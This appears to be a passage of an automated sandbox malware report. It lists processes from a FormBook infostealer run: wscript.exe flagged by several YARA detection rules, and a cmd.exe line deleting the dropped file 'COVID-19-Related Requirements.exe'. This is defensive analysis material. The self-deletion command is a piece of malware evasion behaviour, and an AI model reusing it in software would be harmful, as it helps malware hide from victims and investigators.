                                        Commandline:
                                        Imagebase:0x7ff6f22f0000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Analysis Process: wscript.exe PID: 4112 Parent PID: 3440

                                        General

                                        Start time:19:59:40
                                        Start date:26/05/2021
                                        Path:C:\Windows\SysWOW64\wscript.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\wscript.exe
                                        Imagebase:0xe20000
                                        File size:147456 bytes
                                        MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        Analysis Process: cmd.exe PID: 5768 Parent PID: 4112

                                        General

                                        Start time:19:59:45
                                        Start date:26/05/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del 'C:\Users\user\Desktop\COVID-19-Related Requirements.exe'
                                        Imagebase:0x2a0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Analysis Process: conhost.exe PID: 1340 Parent PID: 5768

                                        General

                                        Start time:19:59:46
                                        Start date:26/05/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff61de10000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Code Analysis

                                        Reset < >